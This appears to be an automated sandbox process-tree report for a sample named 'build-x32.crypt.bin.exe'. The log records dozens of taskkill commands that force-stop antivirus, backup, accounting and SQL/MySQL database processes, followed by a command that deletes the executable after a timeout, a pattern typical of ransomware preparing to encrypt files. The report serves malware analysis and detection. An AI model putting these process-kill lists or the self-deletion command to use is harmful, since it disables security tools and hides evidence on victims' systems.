C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM wrapper*2⤵PID:2020
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM wrapper*3⤵
- Kills process with taskkill
PID:1076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM DefWatch*2⤵PID:1824
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM DefWatch*3⤵
- Kills process with taskkill
PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM ccEvtMgr*2⤵PID:1088
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM ccEvtMgr*3⤵
- Kills process with taskkill
PID:1820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM ccSetMgr*2⤵PID:1692
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM ccSetMgr*3⤵
- Kills process with taskkill
PID:1396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SavRoam*2⤵PID:1956
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SavRoam*3⤵PID:1660
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Sqlservr*2⤵PID:1960
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Sqlservr*3⤵
- Kills process with taskkill
PID:2036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqlagent*2⤵PID:1964
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqlagent*3⤵
- Kills process with taskkill
PID:528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqladhlp*2⤵PID:2000
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqladhlp*3⤵
- Kills process with taskkill
PID:1440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Culserver*2⤵PID:1936
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Culserver*3⤵
- Kills process with taskkill
PID:1696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM RTVscan*2⤵PID:2012
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM RTVscan*3⤵PID:1356
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqlbrowser*2⤵PID:1432
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqlbrowser*3⤵PID:1076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLADHLP*2⤵PID:1832
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLADHLP*3⤵PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBIDPService*2⤵PID:1376
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBIDPService*3⤵
- Kills process with taskkill
PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*2⤵PID:1812
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Intuit.QuickBooks.FCS*3⤵
- Kills process with taskkill
PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBCFMonitorService*2⤵PID:1560
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBCFMonitorService*3⤵
- Kills process with taskkill
PID:1916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqlwriter*2⤵PID:1924
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqlwriter*3⤵
- Kills process with taskkill
PID:1648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM msmdsrv*2⤵PID:884
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM msmdsrv*3⤵
- Kills process with taskkill
PID:432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM tomcat6*2⤵PID:1672
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM tomcat6*3⤵PID:520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM zhudongfangyu*2⤵PID:2032
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM zhudongfangyu*3⤵
- Kills process with taskkill
PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM vmware-usbarbitator64*2⤵PID:1364
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM vmware-usbarbitator64*3⤵
- Kills process with taskkill
PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM vmware-converter*2⤵PID:1548
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM vmware-converter*3⤵
- Kills process with taskkill
PID:1128
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM dbsrv12*2⤵PID:1108
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM dbsrv12*3⤵
- Kills process with taskkill
PID:1584
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM dbeng8*2⤵PID:1368
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM dbeng8*3⤵
- Kills process with taskkill
PID:316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*2⤵PID:1592
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##WID*3⤵
- Kills process with taskkill
PID:1668
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*2⤵PID:2044
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$VEEAMSQL2012*3⤵
- Kills process with taskkill
PID:1852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*2⤵PID:1508
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$VEEAMSQL2012*3⤵
- Kills process with taskkill
PID:2036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLBrowser*2⤵PID:1520
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLBrowser*3⤵
- Kills process with taskkill
PID:1964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLWriter*2⤵PID:1712
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLWriter*3⤵
- Kills process with taskkill
PID:1440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM FishbowlMySQL*2⤵PID:1392
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM FishbowlMySQL*3⤵
- Kills process with taskkill
PID:1536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*2⤵PID:2024
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##WID*3⤵
- Kills process with taskkill
PID:668
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MySQL57*2⤵PID:2020
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MySQL57*3⤵PID:576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*2⤵PID:1824
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*3⤵PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQLServerADHelper100*2⤵PID:1512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQLServerADHelper100*3⤵
- Kills process with taskkill
PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*2⤵PID:1720
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*3⤵
- Kills process with taskkill
PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM msftesql-Exchange*2⤵PID:1784
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM msftesql-Exchange*3⤵
- Kills process with taskkill
PID:1916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*2⤵PID:1988
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##SSEE*3⤵PID:1648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*2⤵PID:1656
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$SBSMONITORING*3⤵
- Kills process with taskkill
PID:432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*2⤵PID:284
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$SHAREPOINT*3⤵PID:520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*2⤵PID:1540
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*3⤵
- Kills process with taskkill
PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*2⤵PID:1352
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*3⤵
- Kills process with taskkill
PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*2⤵PID:1616
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$SBSMONITORING*3⤵
- Kills process with taskkill
PID:1128
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*2⤵PID:1836
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$SHAREPOINT*3⤵
- Kills process with taskkill
PID:1584
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C timeout /T 15 /NOBREAK && del "C:\Users\Admin\AppData\Local\Temp\build-x32.crypt.bin.exe" /F2⤵
- Deletes itself
PID:292 -
C:\Windows\SysWOW64\timeout.exetimeout /T 15 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:792
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:744